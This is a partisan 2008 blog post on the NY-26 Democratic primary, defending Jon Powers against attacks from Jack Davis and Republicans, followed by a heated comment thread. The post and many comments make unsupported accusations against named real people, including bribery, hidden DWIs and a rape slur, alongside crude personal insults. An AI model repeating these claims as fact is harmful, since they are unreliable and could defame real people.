Davis has nothing else to do, really. The two-time loser ran in ’04 and ’06 in a fit of ongoing pique against the Republican Party, which couldn’t be bothered with his concerns about free trade and blew him off. Because his message against free trade was so palatable to people whose jobs are threatened with exportation, he had overwhelming support in both races from organized labor and the Democratic Party faithful.
Not so this time, Davis finds himself completely bereft of endorsements. No one is supporting him except the people he can pay off. Whether buying their votes with cheap gas, or by paying off the wives of Independence Party leadership in Monroe and Erie Counties in order to get a leg up, Jack Davis will do and say anything to get elected. The gas giveaway was tantamount to him standing on a street corner handing out lit with $50 bills attached, yet he bleats on about being a “patriot” who isn’t trying to buy an election. Monroe’s IP chair was fired for accepting what the party called Davis’ bribes. Erie’s chair is such damaged goods that even his friend Joe Illuzzi has called for his replacement.
So, Davis is left sitting at his corporate/campaign HQ, getting his spokesguy to release absolute and utter falsities. Memo to Jack: it won’t get you any more traction to tear down Powers, and no one – no one is going to change their minds and back you again. As Genesee County Democratic Chair Charlie Mallow put it,
As many other letter writers have shown, Jack Davis doesn’t know what issues matter to Democrats because….he doesn’t care to know them. During the last two elections, Jack didn’t go out and meet anyone because he wouldn’t campaign. Jack is above all that. Jack thinks that he can just buy an election with fancy two sided color mailers. I already received five of them in the mail. Rip off musical ads and buying people off with cheap gas are more of his most recent techniques. Those things don’t constitute reasons to vote for someone. Ideology and platform do.
And Davis isn’t the only one.
The Republicans also hit Powers yesterday on the War Kids Vet non-scandal.
Erie County Republican Chairman James P. Domagalski [said] “We need leaders in Congress who believe in transparency and accountability.”
Well, that’s interesting, isn’t it? For the Republican Party to interject itself into a Democratic Primary? Fascinating indeed to trot out various and sundry Chairmen of the Republican Party to comment on – well, the frontrunner in the Democratic primary.
Domagalski wasn’t such a loud proponent of transparency and accountability when it came time for Tom Reynolds to answer questions about Mark Foley. Instead, the Republican version of “transparency” and “accountability” was to issue limp denials surrounded by innocent children.
And all of this short-term-attention-span-disorder points to only one thing – the Republicans are petrified of running Chris Lee against Jon Powers.
Career politician Tom Reynolds has been suckling on the public teat since 1974, and Lee is his hand-picked suckle-cessor. Are you better off now than you were in 1989? 2000? 2004? 2006?
Alice Kryzan? She supported Reynolds monetarily and defended Hooker Chemical, the polluter/murderer of Love Canal. Jack Davis? He’s a horrible campaigner and is, frankly, easy as hell to beat (see Tom Reynolds ca. 2006). Chris “Tabula Rasa” Lee would have no problem bloodying either of these two.
The Republican Party is scared of Powers because they know their brand is tainted, they know they are bereft of ideas, and they know that they are partly to blame for the decline of the 26th District. Who has represented this district in the past few decades? Tom Reynolds? Bill Paxon? Jack Kemp? And in that time, the population loss for New York has been so stark as a result of a failure of vision and leadership that Kemp went from representing the 39th district to the 36th district, and now we only have 29. We lost 30 and 31 in the 2000 census. We lost 32 – 35 in the 1990 census.
Chris Lee has nothing to run on. Apart from his stellar maxing out of local Republican donors, I haven’t seen one story – one fresh idea come out of that campaign. I haven’t seen one positive proposal put forth that would reverse years’ worth of benign-but-pork-laden-neglect from the likes of Tom Reynolds. And what could Lee possibly know of the problems facing the average voter in NY-26? I don’t know a lot of multimillionaires for whom the price of a gallon of gas dents the family budget to the point that “staycation” has entered the vernacular. I don’t know a lot of multimillionaire scions who can really relate to the notion that New York is in a recession, the federal government can’t even get cross-border stuff with Canada right, and whose only real solution is to drill s’more.
It’s no wonder that the Republicans are petrified of Powers. That’s why, when the Form 990 for War Kids Relief –
– War Kids Relief which, incidentally, Jon Powers started up after his tour of duty in the Iraq war, and saw that Iraqi kids were ripe for the picking by jihadists to be slaughtered through attacks on American troops, decided that if the US wasn’t going to pay any attention to trying to give them hope for a future, he would try to do something. And he did. And War Kids is an ongoing concern from which he did not pay himself $66,000, contrary to the lies put forth by the 26th’s own Montgomery Burns and his stenographer, Bob McCarthy, and continues to do outreach to Iraqi kids to underscore the fact that America isn’t their enemy, but wants to help them. The effort was not only a success, but it was a noble success, at that.
– that’s why, when the Form 990 for War Kids Relief is posted, I hope that Jon Powers marches down to Republican Headquarters at the Statler Building and delivers it in-hand. And I hope that he then challenges the Republican chairs to come close to matching what Powers has done to fight for his country, to honor his home, and to try to do something – anything – to ensure that Iraq’s next generation remembers America and Americans as being their friends, their friends who helped them and cared for them, and gave them an example of what life could be, without war and oppression.
Erie County Democratic Chairman Leonard R. Lenihan issued his own response:
“I wonder how many people at that press conference put their lives on the line in Iraq. How can they criticize someone who braved the horrors of that war and then willingly returned to help the many children from families that were killed or displaced by the war?
“The fact that Republicans are intervening in a Democratic primary indicates their desire to avoid facing Jon Powers in November,” he added. “Haven’t we had enough of this swift boat sleaze?”
Why, someone might almost suspect that Davis colluded with the Republicans to hit Powers from two fronts.
UPDATE: Buffalo Bean has an image of the citation itself. Note the right margin: where it says “Defendant’s signature (If minor misdemeanor)”, at the scene, Powers refused to sign the ticket because he adamantly stated he never cursed the cop out. When he was faced with the choice of being arrested or signing the ticket, he signed it with the words “I never said that.” I never said that.
For the uninitiated and dumb, a ticket is an allegation – it is the officer’s claim that Powers said these things in a crowd. Powers denied it then, denies it now. This is why we have trials. This is why Powers pleaded no contest. Since Buffalo Bean has the ticket, I trust he also has the documents showing its disposition.
UPDATE: Here are two guys in suits calling on Jon Powers to release the Form 990 that was due today and has been filed, and will answer all of their questions. Fucking cheap stunt from two guys who probably never gave two thoughts for kids in Iraq before yesterday when the cameras were rolling.
UPDATE: Robert Harding says Davis had three attacks against Powers – youth, disorderly conduct, and War Kids money. He’s out of ammo. All that stands between Jack Davis and obscurity now is a couple weeks’ time.
Cartoon by Adam Zyglis
Tags: Alice Kryzan, America, election, erie county, Independence Party, jack davis, jon powers, News, NY-26, Rep. Christopher Lee, Rep. Tom Reynolds, Republicans
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142 Responses to “Who's Afraid?”
Kevin Hardwick August 15, 2008 at 10:40 am #
Before they begin, I’m setting the over/under for comments to this post at 71.
Jackson Smiles August 15, 2008 at 10:40 am #
Powers paid $ 25 for the ticket and $ 65 in court fees (90 total) — all that fuss over a $ 25 ticket?
I just donated $ 90 to the Powers Campaign to defeat Jack Davis and his GOP buddies… I suggest you all do the same.
Donate $ 90 today to Powers for Congress to help him rid NY-26 of Jack Davis!!!!!!
Did anyone see the video of the news conference for the Republicans? 4 people showed up! The Erie and Niagara country guys look like frat party rapists!!!
Jaquandor August 15, 2008 at 10:45 am #
Wow, that’s the biggest laugh I’ve had all day, and I’ve already read today’s “Get Fuzzy” and xkcd.com. Republicans for transparency and accountability! Heh!
Russell August 15, 2008 at 10:47 am #
BP, you didn’t post the part of the article that mentions that the citation lists the cursing. It’s not a flat out lie if he has a legal document to back up the claim.
I understand your point that you can take some comfort in being attacked on both sides. Sure, being attacked must mean you’re doing something right. People wouldn’t pay attention to you if they didn’t have to, but this cannot be good for Jonny. Even if it is just one media outlet again, it is not benficial for Jonny to have a weekly, credible column posting negative news about him. There is still nothing positive about Jonny going out there, not even that he’s paying for himself. All the news out there about Jonny is negative, whether it’s originating from opponents or not. He should have gotten ahead of the charity story long ago and he should have defined himself strongly enough already where these stories wouldn’t matter. Fact is Jackie Jacko is doing a much better job getting his information out there, whether it’s positive about himself or negative about Jonny.
You mentioned a couple weeks ago that positive, newsworthy things were coming from Jonny very soon. Now we’re just over four weeks from the election and there’s still nothing. Oh, there was one article about him accepting a union endorsement and outlining his trade policy, but that’s not much. His campaign has been very unimpressive. They’ve been at it over a year and are still behind. I haven’t even seen the requisite introduce yourself to the voters commercial.
Haterade August 15, 2008 at 10:55 am #
I heard somewhere that Davis once ran over a guy in a wheelchair – has anyone else heard this ?
Buffalopundit August 15, 2008 at 10:55 am #
Well, Russell, there was the education platform he released, but I didn’t post about it. You’re welcome to read about it here.
I’d venture to say that Powers’ site has more substantive information on it than any other candidates except, arguably, Kryzan’s.
Also, if he was so behind, he wouldn’t have Davis and Domagalski coming after him so hard.
As for the allegation that the citation lists cursing, Powers was in a crowd leaving a football game. Someone cursed out a cop. It wasn’t Powers, and he denied it on the scene and in court. Either way, he pleaded no contest to an obstruction of traffic charge. I think the severity of the violation is underscored by the paltry fine paid.
Merr August 15, 2008 at 10:59 am #
Buffalo Bean’s website has a copy of the citation. It wasn’t for jaywalking.
Jon Splett August 15, 2008 at 10:59 am #
Had he actually told a cop to fuck off, I might have considered voting for him.
Hey Splett – did you vote for Ron Moss ?
BP, I’m talking about things in the media, not information on Jonny’s website or his press releases only picked up by his supporters. I did not see his education policy in The Buffalo News or on the local TV stations. Maybe I missed it, but I don’t think it was there.
Your crowd story doesn’t change the fact that the citation mentions he swore at a cop. That’s all I said and it’s there.
And again, whether Davis and Domagalski are coming after him does not change the fact that his campaign is not in front on any of this, is playing catch-up most of the time, and hasn’t even introduced Jonny to the voters yet. This is all part of the game, even what Jackie Jacko and Chubby Jimmy are doing. Powers is not playing the game well at all. I haven’t seen polling numbers, but it just seems reasonable that this kind of press without any counter or positives has got to hurt a candidate.
LOL “jacki jacko and chubby jimmy”
Powers has the support of, and traction with, the people who are going to vote in September. Davis doesn’t.
I don’t live in the city but given the choices in the last election, I probably would have voted for Ron Moss or at least donated a 12 pack to his campaign.
How about the few dozen witness the Powers campaign offered to produce?
Seriously a $ 25 ticket? I think Davis did run down someone in a wheel chair, but it was right after clubbing a baby seal… and then getting divorced 3 times and having all his kids disown him.
Davis has no support and these stories won’t go anywhere.
Russell – you’re wrong Power has come out in the media against War Kids – as shown in that lockport radio show… should the Buffalo News choose not to run with it so be it. I’m sure McCarthy would voluntarily put up a big front page article that says “my article was wrong”… oh wait no he wouldn’t.
Merr —
I checked out the citation on Buffalo Bean – thanks for helping us prove Jon didn’t say anything wrong – right on the thing it states “I didn’t say that”
Both the officer and Powers signed it. In the court of law he was later found not guilty of saying that remark, just a $ 25 ticket.
Again proving Jack Davis will make a mountain out of a mole hill to cover up his law breaking campaign. What’s worse a $ 25 citation, or $ 5000 bribes, or illegally obtaining petitions, or breaking copyright laws in the music industry?
Davis is a hack and Dommy Dom from the GOP should lay off the cheeseburgers.
Red August 15, 2008 at 11:39 am #
Hey Professor Hardwick, I’ll definitely take the over!
I’m guessing 101.
Good luck fellas!
Russey will beat the over single handedly !
Thanks for the vote of confidence Haterade. A Friday post, though, I might have to go with under.
@BP, you seem pretty confident, so I guess we’ll see in less than a month. I just think no candidate is that teflon.
@Jackson, he came out against War Kids? What? And some minor Lockport radio show that very few people can pick up let alone actually listen to does not come close to the readership of The News or the viewership of any of the local stations…well, maybe channel 7.
Plus, Jonny was not found “not guilty” of anything. He pled “no contest”–big difference, but that doesn’t even matter. And Jackie Jacko has not been charged with any of those crimes you allege.
Russell August 15, 2008 at 12:03 pm #
Oh, and BP, I’m glad you enjoyed the names. My fans have been demanding equal time so I had to oblige.
Dan Meyer August 15, 2008 at 12:05 pm #
Hardwick said:
That made me laugh right out loud.
And I’ll also take the over. I’m saying 83 posts.
Stephen Nazwisko August 15, 2008 at 12:07 pm #
Kevin – Under. 52.
BP – you are mixing up Davis with Gerken. You say Davis can’t campaign, but the truth is that Davis is fine, not great, but fine, the problem is that Gerken can’t RUN a campaign, as we saw in 06 and we’ll see again next month.
tit for tat August 15, 2008 at 12:13 pm #
While not done in a big media splash kind of way, residents of the 26th district ARE being introduced to Jon Powers via door to door visits and thousands of phone calls from personal friends and family of Jon, if not Jon himself. This is a strategy that exists even if you don’t read about it in the Snooze. Also, the amount of focus on Jon Powers in various comments on this site (many of which are not directly related to the original posts) is an indication to me that there is a buzz out there about him, good or bad, like it or not. We wouldn’t be talking about a ticket for disorderly conduct after a football game when he was in college if he wasn’t a threat to the other candidates, both Dem and Rep. I think he may have burned some ants with a magnifying glass when he was six. Better call in PETA!
Go Jon Powers!
Jackson Smiles August 15, 2008 at 12:25 pm #
Tit for tat- great post.
And Russell — Davis hasn’t been charged yet, but he’s under investigation — big difference? The guy bribed the IP party heads, and the IP even came out to say so. What more proof do you want? Your the type of guy who probably thinks OJ really didn’t kill his wife.
Nazwisko – how many campaign managers did Davis burn through in 06? Like 3 or 4 right? Davis came within a few points and he didn’t do a damn think. The crazy old bastard won’t even get out of his Monty Burns like car at parades — he openly said gay rights aren’t important — he thinks the mexicans are trying to steal california and nevada — and the this Gerken guy took him with 2 points of victory??
That’s pretty damn impressive.
Gerken is not the problem.
Believe me, I know Jon (Gerken, not Powers) personally.
Davis blew it for himself two years ago. He had – and still has – no one to blame but himself.
I’ll ask out loud again… any word on if Davis is going to accept Hardwick’s invitation to appear on “Hardline” and if he is going to be there does he expect one of Kevin’s sons to roll out a red carpet for him when he strolls down the hallways of the Entercom Studios of Buffalo at 500 Corporate Parkway?
Davis speaking on the airwaves of a radio station that is based on a road with the word corporate in it… sounds about right.
If he bothers showing up. My prediction is he won’t come in person but instead want to do something on the phone.
All these Republicans are defending Jack Davis… kind of ironic huh? Want a Republican to win NY-26? Then vote Jack Davis… either way you’ll end up with a Republican in the house and WNY will continue to go down the toilet!!!
Donate $ 90 to Jon Powers for Congress today:
http://www.powersforcongress.com
Fight people like Jack Davis from trying to buy elections and slander the decent people of WNY!!!!
Davis’s had his storm trooper Mullen even attack Powers’ dead grandmother… that tells me all I need to know about Davis’ character!
Support Jon today, help him fight Jack Davis – donate $ 90 http://www.powersforcongress.com !!!!
Russell August 15, 2008 at 1:05 pm #
Jackson, you don’t know if the investigation has anything to with the alleged bribes. And like was covered extensively earlier, if it were a real investigation concerning real charges on a Federal campaign it would at least involve the FEC, but really would have to include the FBI. The NYS BOE investigating anything is pretty useless, other than as part of a political game. So yes, there is a huge difference.
tit for tat, sure buzz is good, but not if it’s always, or almost always, negative, not for an office seeker. That’s my point.
Jackson Smiles August 15, 2008 at 1:22 pm #
What alleged bribes? How about the fact that the Davis camp admitted them, and then said they’d continue, and the IP called them bribes.
There’s nothing alleged about them. You’re “alleging” Powers said something to a cop that he didn’t say. Powers stated then (as seen by the citation), in court, and now that he didn’t say that. The courts accepted the charge and only fined him $ 25. Davis admitted the bribes/payments, he even apologized for them.
Russell, I’m suprised that you’re scared for Lee to face Powers.
Want a Republican in Congress – vote Davis.
Donate to Powers for Congress today: http://www.powersforcongress.com
mike hudson August 15, 2008 at 1:25 pm #
not being a criminal defense attorney, alan, you may be forgiven the nuance in all this but getting non-traffic ticket is always considered an “arrest,” the “charge” is written on the ticket itself and paying the fine is a “guilty plea,” which then results in a “conviction.”
this is a far cry from the harrassment being drummed up by dan rivera, mark panepinto and len lenihan accusing tom reynolds of “bribery” and “fraud,” two crimes which — if there was one iota of proof existing to support the charges, would be being investigated by actual police agencies rather than the politically controlled state board of elections.
powers is desperate, and the polls indicate why. he’s broke, he’s getting savaged every week ijn the media and he’s losing the race.
agan, for the unitiated and dumb — a group that apparently includes alan — a tick is a criminal charge made by a duly appointed officer of the law which must be answered in court.
hank August 15, 2008 at 1:34 pm #
This shit is a hoot.
Does it MATTER which freshman democrat represents this district?
Neither one will have any juice to get anything done.
I especially like the part that blames the Republicans who have represented the district for the mass exodus of citizens from it.
They DID represent the district while all the private industry hauled ass from the area, and took the jobs with them. But they can hardly be blamed for the high corporate tax rate in NYS and the demands of the Loonions that made the private sector jobs disappear.
After all, everyone in NYS believes that the Republicans are all in bed with private industry, right? Who’s the biggest employer in WNY? LOCAL GOVERNMENT. all the big private employers are gone.
Jon Powers getting a 25 dollar ticket is no big deal.
But a lawyer knows if you pay a 25 dollar ticket, or ANY ticket, it’s an ADMISSION OF GUILT. Don’t matter if it’s running a stop sign or jaywalking. If you pay it, you’ve admitted you’re guilty.
Not that jaywalking would keep anyone from voting for either one of these 2 deadheads. All the Bluey Dem’s will vote, and one of the deadheads may well go to DC, and be just as ineffective as their campaigns have been.
Ask the Democrats who stayed in DC with the republicans, getting Prime Minister Pelosi to allow an up or down vote on removing the congressional moratorium on drilling.
If you’re a Democrat representative, and you don’t follow the Iron Bitch’s orders, your district can expect less than Jack Shit.
So everything will just continue to get worse and worse, no matter WHO wins the D primary. Just another day in the office for NYS.
Thanks for the entertainment though.
Jackson, I’m not alleging anything. I merely pointed out that The News article metioned that the citation stated it. And if they were bribes, not just alleged, then Jackie Jacko would already be in jail.
If I were “scared for Lee to face Powers” I wouldn’t be wasting my time on this blog. I’d actually be out trying to do something about it. Since there’s nothing to be afraid of, I can fritter away my time being entertained and entertaining others on this site.
wow, i hadn’t even read the psosts before. here is a story about a nice cleveland cop who should have charged the powers with resisting arrest just for being a complete asshole and instead it gets turned into a plea to send poor little jonny money?
jackson smiles once again shows it’s political acumen by stating authoritatively “this isn’t going anywhere.”
dude, it alwaydy did got somewhere, the front page of the buffalo fucking news.
Chris Smith August 15, 2008 at 1:44 pm #
Alan says: Powers has the support of, and traction with, the people who are going to vote in September. Davis doesn’t.
Absent polling data, we don’t know who is going to vote, what turnout will be like, nor do we know if they support Davis, Kryzan, or Powers.
For all we know, Davis could have a 10 point lead in the polls simply based on name recognition and branding. BTW, name recognition is the predominant determinant of victory in primary elections…something Davis has in spades.
distresing August 15, 2008 at 2:04 pm #
@mike hudson – Hey, Freud, you’re slip is showing. “this is a far cry from the harrassment being drummed up by dan rivera, mark panepinto and len lenihan accusing tom reynolds of “bribery” and “fraud,” “. Um, you meant to say “Jack Davis”, didn’t you? But, I can see how easily it is to confuse one with the other. They’re both Republicans after all.
Like clubbing baby seals in a barrel.
Buffalopundit August 15, 2008 at 2:14 pm #
Hudson doesn’t know section A in the paper from section D in the paper. And “nice Cleveland cop” – you were a punk?
lulu August 15, 2008 at 2:33 pm #
Entertaining others, Russell? Is that really how you see your contributions to the comments on this site? A entertainment? Hmmm.
By the way, I took a nasty yellow fire water shooting out my ass shit this morning. It was very entertaining.
Kevin Hardwick August 15, 2008 at 2:37 pm #
Dan Meyer,
Regarding Jack Davis’ response to my invitation to debate on August 31 – All Quiet on the Western (New York) Front.
BTW, I don’t think Stephen Nazwisko has a prayer. Red is in the running, but I think it’ll still be within 10 either way of 71.
lulu, I know you love me.
hudson – are you sober yet? “it alwaydy did got somewhere”
you call yourself a reporter… but down the bottle buddy.
Russell – if you’re not afraid of Powers v Lee, then why not support the guy? Why do you always trash him and not Davis? You’re so pro-Davis it seems like you’d vote Davis instead of Lee.
Jackson, what are you on? Why would I support the guy just because I don’t fear him going up against the candidate I’d vote for?
I wouldn’t say I’m pro-Davis, but I could be classified as anti-Powers.
Dan Meyer August 15, 2008 at 3:28 pm #
Thank you Mister Professor for the update on the August 31st proposed showdown in the WBEN Studios.
Quick question for all of you to ponder:
How does all of this back-and-forth between the Powers and Davis camps impact Kryzan’s campaign?
Discuss amongst yourselves…
Becky August 15, 2008 at 3:35 pm #
You might think Kryzan would come out on top of the heap by staying out of the muck and mire – however I think she’s disappearing out of the stream of consciousness.
I think Powers will still win the Democratic nod, but the real challenge is in the general election, where all Lee has to do is fill in the space after “Republican” in this district.
Russell and Davis sitting in a tree… faking petitions and bribing IP…
Did you and Davis go to prom together?
Mr. Meyer – if anything it shows that Kryzan isn’t a contender at all. No one in the political or news world thinks or her campaign as effective. She’ll probably either get some of Davis or Powers’ votes… the biggest concern is will she get enough votes to hurt either candidate?
Kryzan staying on the ballot is like bringing a peanut butter and jelly sandwich to a smorgasbord.sandwich to a smorgasboard… it’s pointless.
(sorry for repeating smorgasbord its just to prove how pointless it is)
hey alan, i keep buying crackerjack hoping to get a law degree just like yours but i guess they stopped handing them out that way when lucky draws such as yourself began handing out such wacky legal advice.
i am so looking forward to sept. 10!
Where did I give legal advice?
I’ve seen better journalism than yours wrapped around a piece of Bazooka Joe.
whether or not powers paid himself a “salary” of $77g out of the orphans war relief money isn’t even the question.
the question is, since he raised $250k and none of it went to the orphans, where the fuck did it go?
and what about the 5-year-old chinese child slave laborers who made those fucking soccer balls?
no, it seems that orphaned and enslaved children are merely pawns in powers’ mad obsessive game of backdoor political dealmaking. he should have run for clarence town supervisor, where he would have undoubtedly done better than alan did.
the analysis of the 990’s will be the final shoe to drop, quite likely in the news on sunday, though looking at the numbers this afternoon it’s pretty clear davis doesn’t even need it at this point.
Mike August 15, 2008 at 3:52 pm #
Please don’t ruin the good name of Crackerjack’s !!
Mike Hudson. Political analyst to the illiterate.
Homer August 15, 2008 at 4:07 pm #
Oh come on…
I’m looking at the video of Domagalski…
Someone start the chant with me…
Come on…you know it…
Fat guy in a little coat…
steve August 15, 2008 at 4:13 pm #
@ Jackson smiles — “hudson – are you sober yet? “it alwaydy did got somewhere”
“…but down the bottle…”?!?
I love it when someone tries to trash another for bad spelling (or, in most cases, bad typing), and then leaves a typo in the process.
The pace of play has slowed here. I’ll take the under at 67.
Homer —
Domagalski retired from his previous job: the hamburgler. The youtube video should end as following: “robble, robble”
Tbone August 15, 2008 at 4:36 pm #
I would consider myself a democrat any day of the week- but how is it that you figure a freshman republican in the minority, in a district that is traditionally republican, will have more “juice” that a freshman democrat in the majority, with a leadership desperately want to keep the district in democratic hands?
Either you know jack squat about politics and governance or your so biased and politicized that you cant honest with yourself.
Lenny Lenihan August 15, 2008 at 4:43 pm #
I think Domagalski looks more like Grimace than the Hamburgler:
http://buzzfeed.com/peggy/dancing-grimace/youtube_-_grimace_dancing_with_kids
Just wondering – why didn’t Chris Lee give the speech instead of Domagalski?
jack davis August 15, 2008 at 7:04 pm #
Chris Lee was too busy hiding his 2 dwi’s
jacksonsmiles August 15, 2008 at 7:15 pm #
steve – i never claimed to be a reporter like Hudson. Has hudson climbed out of his mom’s basement yet?
Oh, c’mon now. Isn’t “mom’s basement” a variation on Godwin’s Law?
jackson smiles — I don’t believe Hudson claims to be a reporter…he is a reporter. We can discuss the quality of his work another time, perhaps, but it’s clear that he earns at least part of his living doing it.
In any event, I’m sure the Powers campaign is thrilled that some of his apparently staunch intertube supporters defend him and his positions by referring to people as drunk basement dwellers, and hamburglers, and so on. Because, clearly, that is directly related to how well someone performs his or her job. Oh, wait…there’s Len Lenihan, he of the GQ looks and Body by Jake physique, eh?
But, yes, America needs another well-dressed, well-coiffed, bling-bright-smile empty suit in Washington.
unlike jackass smiles, and apparently pundit, i have a job that requres me to spend large portions of my day away from the computer. i don’t drink, and had smiles read my second book, he/she/it would have known that i left home some 36 years ago, at the age of 16.
unlike pundit, i’ve never been a registered member of the republican party nor have i run, and lost embarrassingly, for public office.
for more than three decades, i’ve made a modest living as a writer/musician, and i’d just like to take this opportunity to invite everyone to join me at the rock and roll hall of fame and museum on nov. 19 at 7:30 p.m., where i will be discussing my career in a public forum with jason hanley, the director of that institution’s department of education.
Sue August 16, 2008 at 12:57 am #
The best part of this whole thing was the guy who said he would vote for Powers had Powers really told the cop to go fuck himself. That was hilarious.
Hardwick, are you going to press for Davis to come on your show? That guy is hilarious. I’d love to hear a debate with him in it. He actually said gay rights are not important in the link on Pundit and I saw some thing about him saying he wanted to preserve the white race on you tube. How has no one in the mainstream written an article about how this guy is crazy????
You have to push him to get there. At least with Davis you’ll have a chance of hearing a congressional candidate belt out a racial slur or some derogatory comment toward women. I would not be surprised if he gropes the eyebrow lady on her way in. Guy is such a pervert
What is the eyebrow lady’s name again?
jacksonsmiles August 16, 2008 at 9:36 am #
hi hudson – how do you know what me/his/her job is? and you were able to sting enough words together to write a book?
I think I saw it in Barnes and Nobles — C is for Cow? It had all those nice color farm photos and a button that made a moo-moo noise?
mike hudson August 16, 2008 at 9:46 am #
jackass smiles…in describing you, i wrote “he/she/it” not “me/his/her.”
your literacy is such that it is quite appropriate for you to be in the pre-school section at b&n, as you stated. perhaps this is also where you picked up your political philosophy?
sean August 16, 2008 at 10:00 am #
This is better than youtube. I am down with voting for any guy or girl who tells a cop to go fuck himself. And Davis’ only appeal as I recall was giving that fat ass Reynold’s a burr in his saddle just as the shades were coming down on his Mark Foley friendly career ! JD strikes me as a taller crazier Ross Perot rich old coot who wants to buy a seat somewhere, speaking of which if Golisano buys the Bills and tells Ralph to fuck off I’ll vote for him too !
Mike August 16, 2008 at 10:22 am #
We all like poking fun at hudson, because like making faces at a monkey in a cage it get some great reactions(shit throwing). He’s not the greatest reporter but he’s the best one in niagara falls that still has a job. Any one who raises questions about shady county dealings are usually run out of town on a rail, just ask tom cristy.
mike hudson August 16, 2008 at 11:15 am #
oftentimes i feel like a monkey in a cage.
one of these days i might bust out though.
distresing August 16, 2008 at 11:41 am #
Yep, but you’d still be a monkey.
I’d better start making arrangements NOW for Hudson at the R&R Hall of Fame ! My guess is that all area hotels will fill up quickly and capacity of the building will be met early !
If you are publicly speaking / discussing your career starting @ 7:30 …. my calculations suggest that it should be over at , say – about 7:33 ? BTW, I loved you and your brothers in the “Razzle Dazzle Show” when I was a kid ….
distresing August 16, 2008 at 12:06 pm #
“Hey, Margolis”
Ghost of Ellis August 16, 2008 at 12:53 pm #
Jon and his minions spend so much time preaching how he is reaching out directly to the people of WNY, but what we don’t ever see is JON POWERS addressing the tough issues that voters need to hear.
So far, Jon’s platforms aren’t even his or reflective of the needs of the people of the 26th district. They are cobbled together by the prostitution of his political soul to the ultra liberal donors from everywhere but the 26th.
Jon has never been nor will ever be for the people of WNY. Even his primary reason for running for Congress – stated over and over again – has been because he wants to help the children of Iraq.
So Jackson – I suggest that you go back to Jon Jon and tell him to quit worrying about Jack or Alice or Chris and focus on saving his soul.
but isn’t a souless congressman a perfect representative for western new york, the most souless place on any north american map?
prideful ignorance, defensive “progressivism” that substitutes for critical thought, 120 pages worth of lawyers in the yellow pages, a lousy football team, rubes who think of wings as cuisine…
the more i think about it the more powers seems to be the ideal candidate.
so why is davis beating him like an iraqi prisoner?
It’s official. Over wins!
nice call perfesser….
Thanks, Mike. So how about this? Hudson vs. Pundit on “Hardline” for half an hour the Sunday before the primary. We could make it a pay per view, er, listen. Prior to the event, of course, I’d publish the over/under for the number of times I’d have to utilize the 8 second delay by hitting the dump button.
@Mike – another slip. You typed – “so why is davis beating him like an iraqi prisoner?” Unless you’re just talking out of your ass (because there’s no way you have the self-restraint to keep it to yourself if you had real info), you meant, “Is Davis beating him like an Iraqi prisoner?”
Not that I’m keen on giving Republicans advice, but a lot of the talk that mike and others like him are spouting sounds just like the “don’t worry, be happy” pablum they were puking before the 2006 Congressional election. The atmosphere and the new voter demographic didn’t bother them then,and look what happened. This year, people are even more dissatisfied and the voter demographic is swinging much more towards a demographic that doesn’t favor the Republicans. They might want to start energizing their base instead of trying to calm them.
mike hudson August 16, 2008 at 11:57 pm #
disheveled….i wasn’t invoking any gop pablum prior to the 2006 congressional races as i am not a republican. the gains in the house and the senate, i suspect, will continue in 2008, and that is a good thing.
the problem is the idiot you phony progressives have chosen to run. i don’t give a rat’s ass. my congresswoman is the great louise slaughter, with whom i worked a few years back to investigate jeff gannon, the fake white house reporter who got credentialed in order to lob softballs for bush administration officials to hit.
my interest in powers-davis began as a professional diversion and took on a more serious aspect only when morons like pundit began hurling insult, abuse and invective my way.
powers raised as much as a quarter of million dollars in order to build orphanages for children in iraq. the money was spent, there are no orphanages, he’s got a problem.
according to police reports, powers was wandering around near the intersection of cedar and lee in cleveland heights at 2 o’clock in the morning and, when approached by officers, chose to yell “what are you fucking looking at…fucking cop.” he was charged with disorderly conduct for “recklessly causing inconvenience, annoyance & alarm.”
petulantly, like any frat boy, he refused to sign the citation. he’s lucky the cop didn’t just crack his skull open with a nightstick and charge him with resisting arrest, which happens to assholes in similar situations every night of the week in this great country. the officer, in my view, showed remarkable restraint.
his campaign said the appearance ticket he got that night was for “jaywalking,” which was a total lie. he’s got trouble.
and when his 990s are made public, sometime between now and sept. 9, he’s going to have even more trouble.
agents working on his behalf have subpoenaed me and my business records in a fishing expedition designed to show that the niagara falls reporter has a fiduciary relationship with jack davis. they came up empty, but have managed to piss me the fuck off even more.
the fact that you simply cannot believe anyone could oppose your hero without some dark and sinister motive — as opposed to, say, simply thinking he’s an incompetent boob — represents what is known as a “cult of personality.”
this also applies this year to the obama candidacy, which we’ll probably be getting more deeply into once this primary is over with. right now it’s:
obama 44%
mccain 44%
jacksonsmiles August 17, 2008 at 12:33 am #
hudson avoided the topic of the fact that’s he hates obama and how terrible obama is… yet he’s right there with McCain,
hey ghost ellis… way to write the same thing on two blogs. glad you can come up with an original comment…
hudson – if powers was “hammered drunk” why was he able to write so clearly, why was he able to presumably have a conversation with a police officer, make a comment on the ticket, and not get arrested or “cracked in the head” with a night stick…
you’re proud of an officer not physically beating a suspect? did you pop popcorn and cheer on the rodney king beating?
and “agents working on his behalf” ? for a guy who’s new to politics he’s already got a secret task for designed to attack fat reporters who drink on the job and live in their moms basement? you’re really that paranoid?
you can attack my grammar all you want, but i’m not a “reporter who wrote a book.” why don’t you see if your mom’s got anymore hot pockets left and take a nap. i’m awaiting your second best seller “D is for Dog”
hey remember when Davis said the Mexican’s are going to steal California? Or when he said gay rights weren’t an important at all?
Or the best might be… when he attacked Powers dead grandmother for political purposes…
oh that was probably the best. The guy attacks a candidates dead grandmother.
Wow I’m so glad Davis is a stand up character… what does he stand for on any issue again?
CIA guy August 17, 2008 at 1:05 am #
hey looks at jack davis’s website : he’s so crazy he’s got Mullen putting cookies on everyones computer:
A cookie is a tiny text file that is stored on your computer by Davis for Congress. We use cookies to tailor your experience on our site according to the preferences you have specified. When you visit the John Edwards for President website we only access the cookie file that we have stored on your computer. We cannot and do not access any information stored in a cookie by other websites. Our cookies do not contain any personal identifiable information.
who the hell does he think he is the CIA?
the man is paying to track down those who visit his site. Mullen is going to burn through the millionaires money and still lose the primary!!! awesome!
odn August 17, 2008 at 2:10 am #
I thought “fat guy in a little coat” was funny, until I saw the comment on the actual Youtube video.
Fatty McButterpants tops the cake….!!
jackass smiles, learning disabled poster child for wny “civilization,” thinks the shrimp cocktail is real fancy down there to the red lobster, thinks elmowood is “just like new york city,” a functionally illiterate “progressive.”
aren’t you glad to have him/her/it on your side, alan? supporters like that sure speak well for the candidate.
powers has been effectively neutralized. the subpoena was a desperate, last ditch attempt at redemption. it blew up in their faces because the niagara falls reporter is actually honest. who’da thunk it.
